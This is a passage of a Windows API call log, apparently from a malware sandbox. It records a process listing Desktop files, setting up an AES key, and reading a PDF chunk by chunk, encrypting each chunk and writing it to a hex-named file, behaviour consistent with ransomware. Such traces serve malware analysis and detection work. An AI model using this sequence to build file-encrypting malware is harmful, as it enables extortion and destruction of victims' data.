ftLastAccessTime.dwHighDateTime=0x1d4c9dc, ftLastWriteTime.dwLowDateTime=0xe99437a0, ftLastWriteTime.dwHighDateTime=0x1d4c9dc, nFileSizeHigh=0x0, nFileSizeLow=0xfd12, dwReserved0=0x0, dwReserved1=0x0, cFileName="n0Z4.gif", cAlternateFileName="")) returned 1 [0052.388] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ec8b30, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0x3ba72070, ftLastAccessTime.dwHighDateTime=0x1d4d1a3, ftLastWriteTime.dwLowDateTime=0x3ba72070, ftLastWriteTime.dwHighDateTime=0x1d4d1a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OoP6PKriG", cAlternateFileName="OOP6PK~1")) returned 1 [0052.389] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd64d630, ftCreationTime.dwHighDateTime=0x1d4c963, ftLastAccessTime.dwLowDateTime=0x9389ae00, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x9389ae00, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0x686e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ouf5No.avi", cAlternateFileName="")) returned 1 [0052.389] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712aa650, ftCreationTime.dwHighDateTime=0x1d4d436, ftLastAccessTime.dwLowDateTime=0x43a3a0, ftLastAccessTime.dwHighDateTime=0x1d4cef1, ftLastWriteTime.dwLowDateTime=0x43a3a0, ftLastWriteTime.dwHighDateTime=0x1d4cef1, nFileSizeHigh=0x0, nFileSizeLow=0x10175, dwReserved0=0x0, dwReserved1=0x0, cFileName="pDQPiSB7-4XgC4ZA-.gif", cAlternateFileName="PDQPIS~1.GIF")) returned 1 [0052.389] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35278800, ftCreationTime.dwHighDateTime=0x1d4ce6c, ftLastAccessTime.dwLowDateTime=0x489f09e0, ftLastAccessTime.dwHighDateTime=0x1d4d0b4, ftLastWriteTime.dwLowDateTime=0x489f09e0, ftLastWriteTime.dwHighDateTime=0x1d4d0b4, nFileSizeHigh=0x0, nFileSizeLow=0x12084, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkdmaZV7e.mp3", cAlternateFileName="PKDMAZ~1.MP3")) returned 1 [0052.389] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c902830, ftCreationTime.dwHighDateTime=0x1d4c8ee, ftLastAccessTime.dwLowDateTime=0x6b651ec0, ftLastAccessTime.dwHighDateTime=0x1d4ccd0, ftLastWriteTime.dwLowDateTime=0x6b651ec0, ftLastWriteTime.dwHighDateTime=0x1d4ccd0, nFileSizeHigh=0x0, nFileSizeLow=0x7e83, dwReserved0=0x0, dwReserved1=0x0, cFileName="q-tLmzZ7lKvwTQb.m4a", cAlternateFileName="Q-TLMZ~1.M4A")) returned 1 [0052.389] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2209f020, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0x582a0a30, ftLastAccessTime.dwHighDateTime=0x1d4c886, ftLastWriteTime.dwLowDateTime=0x582a0a30, ftLastWriteTime.dwHighDateTime=0x1d4c886, nFileSizeHigh=0x0, nFileSizeLow=0xe21b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q4reAXGl.flv", cAlternateFileName="")) returned 1 [0052.389] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0b01280, ftCreationTime.dwHighDateTime=0x1d4cecd, ftLastAccessTime.dwLowDateTime=0xa0be8970, ftLastAccessTime.dwHighDateTime=0x1d4d0fa, ftLastWriteTime.dwLowDateTime=0xa0be8970, ftLastWriteTime.dwHighDateTime=0x1d4d0fa, nFileSizeHigh=0x0, nFileSizeLow=0x1ef7, dwReserved0=0x0, dwReserved1=0x0, cFileName="vOXk.png", cAlternateFileName="")) returned 1 [0052.389] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc328ac0, ftCreationTime.dwHighDateTime=0x1d4cc8a, ftLastAccessTime.dwLowDateTime=0x7882add0, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x7882add0, ftLastWriteTime.dwHighDateTime=0x1d4d3d2, nFileSizeHigh=0x0, nFileSizeLow=0xdc08, dwReserved0=0x0, dwReserved1=0x0, cFileName="WYYIF fH.mp3", cAlternateFileName="WYYIFF~1.MP3")) returned 1 [0052.390] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a99e90, ftCreationTime.dwHighDateTime=0x1d4d1c5, ftLastAccessTime.dwLowDateTime=0x756ce620, ftLastAccessTime.dwHighDateTime=0x1d4cc2e, ftLastWriteTime.dwLowDateTime=0x756ce620, ftLastWriteTime.dwHighDateTime=0x1d4cc2e, nFileSizeHigh=0x0, nFileSizeLow=0x929f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y8yKyDCXcG69KB9nVjK.avi", cAlternateFileName="Y8YKYD~1.AVI")) returned 1 [0052.390] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc12330e0, ftCreationTime.dwHighDateTime=0x1d4d207, ftLastAccessTime.dwLowDateTime=0x9e334ef0, ftLastAccessTime.dwHighDateTime=0x1d4c66b, ftLastWriteTime.dwLowDateTime=0x9e334ef0, ftLastWriteTime.dwHighDateTime=0x1d4c66b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YlFbY0GE9kU8pLG", cAlternateFileName="YLFBY0~1")) returned 1 [0052.390] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb912ad10, ftCreationTime.dwHighDateTime=0x1d4cf71, ftLastAccessTime.dwLowDateTime=0x6f47e9e0, ftLastAccessTime.dwHighDateTime=0x1d4caf1, ftLastWriteTime.dwLowDateTime=0x6f47e9e0, ftLastWriteTime.dwHighDateTime=0x1d4caf1, nFileSizeHigh=0x0, nFileSizeLow=0x141f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZY-CLS.bmp", cAlternateFileName="")) returned 1 [0052.390] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3be5810, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0x6875deb0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x6875deb0, ftLastWriteTime.dwHighDateTime=0x1d4d47e, nFileSizeHigh=0x0, nFileSizeLow=0x9570, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hKIlKje.swf", cAlternateFileName="")) returned 1 [0052.390] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3be5810, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0x6875deb0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x6875deb0, ftLastWriteTime.dwHighDateTime=0x1d4d47e, nFileSizeHigh=0x0, nFileSizeLow=0x9570, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hKIlKje.swf", cAlternateFileName="")) returned 0 [0052.390] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0052.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0052.390] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0052.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1bf5d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0052.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0052.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d890) returned 1 [0052.479] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d970 | out: lpFileInformation=0x1bf5d970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279e2c00, ftCreationTime.dwHighDateTime=0x1cd5cf6, ftLastAccessTime.dwLowDateTime=0xcf7c84e0, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x279e2c00, ftLastWriteTime.dwHighDateTime=0x1cd5cf6, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0052.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d850) returned 1 [0054.016] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x1bf5d310 | out: pfEnabled=0x1bf5d310) returned 0x0 [0054.020] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0056.707] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b6e10) returned 1 [0057.222] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x1 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemFree (pv=0x1a624900) [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemFree (pv=0x1a624900) [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemFree (pv=0x1a624900) [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemFree (pv=0x1a624900) [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.223] CoTaskMemFree (pv=0x1a624900) [0057.223] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemFree (pv=0x1a624900) [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemFree (pv=0x1a624900) [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemFree (pv=0x1a624900) [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemFree (pv=0x1a624900) [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemFree (pv=0x1a624900) [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemFree (pv=0x1a624900) [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemFree (pv=0x1a624900) [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.224] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.224] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemFree (pv=0x1a624900) [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemFree (pv=0x1a624900) [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemFree (pv=0x1a624900) [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemFree (pv=0x1a624900) [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemFree (pv=0x1a624900) [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemFree (pv=0x1a624900) [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.225] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.225] CoTaskMemFree (pv=0x1a624900) [0057.226] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 1 [0057.226] CoTaskMemAlloc (cb=0x20) returned 0x1a624900 [0057.226] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x1a624900, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x1a624900, pdwDataLen=0x1bf5da20) returned 1 [0057.226] CoTaskMemFree (pv=0x1a624900) [0057.226] CryptGetProvParam (in: hProv=0x1a5b6e10, dwParam=0x1, pbData=0x0, pdwDataLen=0x1bf5da20, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x1bf5da20) returned 0 [0057.310] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x2231a10, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a5d3080) returned 1 [0057.311] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.121] CryptExportKey (in: hKey=0x1a5d3080, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0058.136] CryptExportKey (in: hKey=0x1a5d3080, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2231b00, pdwDataLen=0x1bf5db30 | out: pbData=0x2231b00*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0058.164] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x2231c20, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a5d30f0) returned 1 [0058.166] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.166] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.182] CryptDuplicateKey (in: hKey=0x1a5d30f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a5d32b0) returned 1 [0058.184] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.187] CryptSetKeyParam (hKey=0x1a5d32b0, dwParam=0x4, pbData=0x2231d68*=0x1, dwFlags=0x0) returned 1 [0058.188] CryptSetKeyParam (hKey=0x1a5d32b0, dwParam=0x1, pbData=0x2231d18, dwFlags=0x0) returned 1 [0058.213] CryptDestroyKey (hKey=0x1a5d30f0) returned 1 [0058.214] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0058.237] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0058.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0058.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0058.733] GetFileType (hFile=0x3d4) returned 0x1 [0058.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0058.733] GetFileType (hFile=0x3d4) returned 0x1 [0058.733] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", lpFilePart=0x0) returned 0x46 [0058.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0058.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aa6820e9d387091bff495dbb3094f239"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x408 [0058.734] GetFileType (hFile=0x408) returned 0x1 [0058.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0058.735] GetFileType (hFile=0x408) returned 0x1 [0058.737] ReadFile (in: hFile=0x3d4, lpBuffer=0x2232118, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2232118*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0058.740] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2246130*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x2246130*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0058.742] WriteFile (in: hFile=0x408, lpBuffer=0x2246130*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2246130*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0058.744] ReadFile (in: hFile=0x3d4, lpBuffer=0x2232118, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2232118*, lpNumberOfBytesRead=0x1bf5da28*=0x371d, lpOverlapped=0x0) returned 1 [0058.744] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x225a170*, pdwDataLen=0x1bf5da80*=0x3710, dwBufLen=0x3710 | out: pbData=0x225a170*, pdwDataLen=0x1bf5da80*=0x3710) returned 1 [0058.744] WriteFile (in: hFile=0x408, lpBuffer=0x225a170*, nNumberOfBytesToWrite=0x3710, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x225a170*, lpNumberOfBytesWritten=0x1bf5da18*=0x3710, lpOverlapped=0x0) returned 1 [0058.745] ReadFile (in: 